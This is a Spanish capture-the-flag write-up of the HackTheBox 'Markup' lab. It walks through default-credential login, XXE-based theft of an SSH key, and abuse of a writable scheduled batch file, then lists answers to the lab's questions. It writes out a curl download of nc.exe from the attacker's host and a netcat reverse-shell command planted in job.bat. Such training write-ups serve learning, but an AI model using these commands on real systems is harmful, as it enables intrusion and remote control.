beafn28
  • 👩‍💻¡Bienvenidos a mi HackBook!
  • WRITEUPS
    • DockerLabs
      • BuscaLove
      • Amor
      • Injection
      • BorazuwarahCTF
      • Trust
      • Picadilly
      • Pinguinazo
      • AguaDeMayo
      • BreakMySSH
      • NodeClimb
      • Move
      • Los 40 ladrones
      • Vulnvault
      • Pntopntobarra
      • Library
      • Escolares
      • ConsoleLog
      • Vacaciones
      • Obsession
      • FirstHacking
      • SecretJenkins
      • HedgeHog
      • AnonymousPingu
      • ChocolateLovers
      • Dockerlabs
      • Pressenter
      • Candy
      • JenkHack
      • ShowTime
      • Upload
      • Verdejo
      • WalkingCMS
      • WhereIsMyWebShell
      • Whoiam
      • Winterfell
      • -Pn
      • Psycho
      • Mirame
      • Backend
      • Paradise
      • Balurero
      • Allien
      • Vendetta
      • FindYourStyle
      • Stellarjwt
      • File
      • Redirection (Por completar)
      • Extraviado
      • Patriaquerida
      • Tproot
      • Internship
      • Walking Dead
      • Bicho (Por completar)
      • BaluFood
    • TryHackMe
      • Brooklyn Nine Nine
      • Blue
    • HackTheBox
      • Nibbles
      • Starting Point
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Explosion
        • Preignition
        • Mongod
        • Synced
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
        • Included
        • Markup
        • Base
      • BoardLight
      • Cap
      • TwoMillion
      • Lame
      • Legacy
      • Devel
      • Beep
      • Optimum
      • Arctic
      • Jerry
      • Sau
      • GoodGames
      • Challenges
        • Emdee five for life
        • MarketDump
      • Intro to Dante
      • Heist
      • OpenAdmin
      • Nest
      • Curling
    • Vulnhub
      • Wakanda
      • Election (Por terminar)
    • The Hacker Labs
      • Avengers
      • Can you hack me?
      • Fruits
      • Microchoft
      • TickTakRoot
      • Grillo
      • Mortadela
      • Zapas Guapas
      • Sal y Azúcar
      • Cyberpunk
      • Papafrita
      • PizzaHot
      • Decryptor
      • Academy
      • Cocido andaluz
      • Find Me
      • Quokka
      • Campana Feliz
      • Bocata de Calamares
      • Casa Paco
      • Torrijas
    • Vulnyx
      • Fuser
      • Blogguer
      • Lower
      • Exec
      • Diff3r3ntS3c
      • Hacking Station
      • Experience
      • Eternal
      • Agent
      • Infected
      • Admin
      • War
      • Hosting
    • OverTheWire
      • Natas
        • Nivel 0-5
        • Nivel 6-11
        • Nivel 12-17
        • Nivel 18-23
        • Nivel 24-29
        • Nivel 30-34
      • Leviathan
        • Nivel 0-7
      • Krypton
      • Bandit
        • Nivel 0-10
        • Nivel 11-20
        • Nivel 21-30
        • Nivel 31-34
    • Proving Ground Play
      • Monitoring
      • DriftingBlues6
  • APUNTES HACKING
    • Pentesting Basics
      • Web Enumeration
      • Public Exploits
      • Types of Shells
      • Privilege Escalation
      • Transfering Files
    • Network Enumeration with NMAP
      • Host Discovery
      • Host and Port Scanning
      • Saving the Results
      • Service Enumeration
      • Nmap Scripting Engine
      • Performance
      • Firewall and IDS/IPS Evasion
    • Footprinting
      • Domain Information
      • Cloud Resources
      • FTP
      • SMB
      • NFS
      • DNS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
      • Linux Remote Management Protocols
      • Windows Remote Management Protocols
    • Information Gathering - Web Edition
      • WHOIS
      • DNS
        • Digging DNS
      • Subdomains
        • Subdomain Bruteforcing
        • DNS Zone Transfers
        • Virtual Hosts
        • Certificate Transparency Logs
      • Fingerprinting
      • Crawling
        • robots.txt
        • Well-Known URIs
        • Creepy Crawlies
      • Search Engine Discovery
      • Web Archives
      • Automating Recon
    • Vulnerability Assessment
      • Vulnerability Assessment
      • Assessment Standards
      • Common Vulnerability Scoring System (CVSS)
      • Common Vulnerabilities and Exposures (CVE)
    • Nessus
      • Getting Started with Nessus
      • Nessus Scan
      • Advanced Settings
      • Working with Nessus Scan Output
      • Scanning Issues
    • OpenVAS
      • OpenVAS Scan
      • Exporting The Results
    • Reporting
    • File Transfers
      • Windows File Transfer Methods
      • Linux File Transfer Methods
      • Transferring Files with Code
      • Miscellaneous File Transfer Methods
      • Protected File Transfers
      • Catching Files over HTTP/S
      • Living off The Land
      • Detection
      • Evading Detection
    • Shells & Payloads
      • Anatomy of a Shell
      • Bind Shells
      • Reverse Shells
      • Payloads
        • Automating Payloads & Delivery with Metasploit
        • Crafting Payloads with MSFvenom
        • Infiltrating Windows
        • Infiltrating Unix/Linux
        • Spawning Interactive Shells
      • Introduction to Web Shells
        • Laudanum, One Webshell to Rule Them All
        • Antak Webshell
        • PHP Web Shells
      • Detection & Prevention
    • Metasploit
      • MSFConsole
      • Modules
      • Targets
      • Payloads
      • Encoders
      • Databases
      • Plugins
      • Sessions
      • Meterpreter
      • Writing and Importing Modules
      • Introduction to MSFVenom
      • Firewall and IDS/IPS Evasion
    • Password Attacks
      • John The Ripper
      • Network Services
      • Password Mutations
      • Password Reuse / Default Passwords
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
      • Pass the Hash (PtH)
  • WEB SECURITY
    • Path Traversal
    • SQL Injection
    • Control de Acceso
  • Mis CTFs
    • Pequeñas Mentirosas
    • CryptoLabyrinth
    • Elevator
    • Facultad
  • PREPARAR EJPTv2
    • Máquinas
    • Curso de Mario
      • Presentación + Preparación de Laboratorios
      • Conceptos Básicos de Hacking
      • Explotación de Vulnerabilidades y Ataques de Fuerza Bruta
      • Explotación vulnerabilidades Web
      • Enumeración y Explotación del Protócolo SMB, SAMBA, SNMP, IIS y RDP
      • Hacking Entornos CMS
      • Escalada de Privilegios + Post Explotación
      • Pivoting con Metasploit
  • Preparar OSCP
    • Información
    • Máquinas
      • Linux
        • Fácil
        • Medio
        • Difícil
      • Windows
        • Fácil
        • Medio
        • Difícil
  • PREPARAR PT1
    • Organización
Powered by GitBook
On this page
  • 1. 📝 Introducción
  • 2. 🛠️ Entorno
  • 3. 🔍 Reconocimiento
  • 4. 🚪 Acceso Inicial
  • 5. 🔑 Captura de la Flag
  • 6. ❓Preguntas

Was this helpful?

  1. WRITEUPS
  2. HackTheBox
  3. Starting Point

Markup

1. 📝 Introducción

  • Nivel de Dificultad: Muy fácil.

  • Tags:

    • Reconnaissance (Reconocimiento): Fase crucial en el proceso de pruebas de penetración, donde se recopila información detallada sobre el objetivo. Este proceso incluye el escaneo de puertos, el análisis de los servicios disponibles, la identificación de vulnerabilidades y la recopilación de datos sobre las configuraciones del sistema. Permite a los atacantes descubrir posibles vectores de entrada.

    • Apache: Servidor web que puede ser explotado si no se aplica la configuración adecuada o si no se actualizan sus módulos y componentes.

    • SSH: Protocolo seguro para acceder de manera remota a servidores, pero con configuraciones débiles (como claves predeterminadas o contraseñas débiles) puede ser una puerta de entrada.

    • PHP: Lenguaje de programación común en aplicaciones web; si no se configura de manera segura, puede ser vulnerable a inyecciones y otros ataques.

    • Scheduled Job Abuse: Los trabajos programados mal configurados o sin restricción de privilegios pueden ser explotados para ejecutar comandos maliciosos o obtener acceso a recursos restringidos.

    • Arbitrary File Upload: Vulnerabilidad en la que los atacantes cargan archivos maliciosos, como shells PHP, para ejecutar código en el servidor y obtener acceso no autorizado.

    • XXE Injection: Ataque de inyección de XML External Entity (XXE) que explota la capacidad de procesamiento de XML para acceder a archivos locales o realizar otros ataques como el denegado de servicio.

    • Weak Permissions: Permisos mal configurados en el sistema de archivos pueden permitir a usuarios no autorizados acceder o modificar archivos sensibles, facilitando la escalada de privilegios o la exfiltración de datos.

2. 🛠️ Entorno

Nos descargamos nuestra VPN y nos conectamos.

sudo openvpn nombre_del_archivo.vpn

Iniciamos la máquina y verificamos la conexión.

ping -c 1 10.129.95.192

Observamos que tenemos conexión y que es una máquina Windows ya que su ttl=127.

3. 🔍 Reconocimiento

A continuación, se realiza el comando:

nmap -sCV -Pn 10.129.95.192

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

4. 🚪 Acceso Inicial

Como podemos observar durante el escaneo, los puertos 80 (HTTP), 22 (SSH) y 443 (HTTPS) están abiertos. A continuación, se indagará más sobre estos servicios.

Nos logueamos con las credenciales por defecto admin:password.

Vamos al apartado de Order e interceptamos las peticiones. Podemos observar que hay un XML External Entity.

Vamos a leer la clave privada de SSH del usuario.

Nos la copiamos y le damos permisos para loguearnos.

chmod 600 id_rsa
ssh -i id_rsa daniel@10.129.95.192

Buscamos lo que nos preguntan.

En este escenario, job.bat es un archivo utilizado para programar una tarea en Windows, que ejecuta el comando wevtutil.exe para registrar eventos. Este archivo es ejecutado de manera regular como parte de una tarea programada.

El objetivo es actualizar este proceso de job.bat de un script de shell simple a un script de PowerShell y verificar los procesos en ejecución con el comando ps en PowerShell.

icacls job.bat

Al observar que el (F) junto a Users en los permisos significa que todos los usuarios pueden modificar el archivo job.bat, se puede explotar esto para agregar un comando de netcat en el archivo. De esta forma, cada vez que la tarea programada se ejecute, la máquina víctima se conectará de vuelta a la máquina atacante.

En nuestra máquina atacante.

wget https://github.com/vinsworldcom/NetCat64/releases/tag/1.11.6.4/nc64.exe
python3 -m http.server

En la máquina víctima.

curl -o nc.exe http://10.10.16.35:8000/nc.exe

Ejecutamos para generar una Reverse Shell.

echo C:\Log-Management\nc.exe -e cmd.exe 10.10.16.35 1234 > C:\Log-Management\job.bat

Nos ponemos en escucha y recibimos la conexión.

5. 🔑 Captura de la Flag

6. ❓Preguntas

Tarea 1

¿Qué versión de Apache está corriendo en el puerto 80 del objetivo? Respuesta: 2.4.41

Tarea 2

¿Qué combinación de nombre de usuario:contraseña inicia sesión con éxito? Respuesta: admin:password

Tarea 3

¿Cuál es la palabra en la parte superior de la página que acepta la entrada del usuario? Respuesta: order

Tarea 4

¿Qué versión de XML se utiliza en el objetivo? Respuesta: 1.0

Tarea 5

¿Qué significa el acrónimo XXE / XEE? Respuesta: XML External Entity

Tarea 6

¿Qué nombre de usuario podemos encontrar en el código HTML de la página web? Respuesta: Daniel

Tarea 7

¿Qué archivo se encuentra en la carpeta Log-Management en el objetivo? Respuesta: job.bat

Tarea 8

¿Qué ejecutable se menciona en el archivo mencionado antes? Respuesta: wevtutil.exe

PreviousIncludedNextBase

Last updated 4 months ago

Was this helpful?

XXE - XEE - XML External Entity - HackTricks
Logo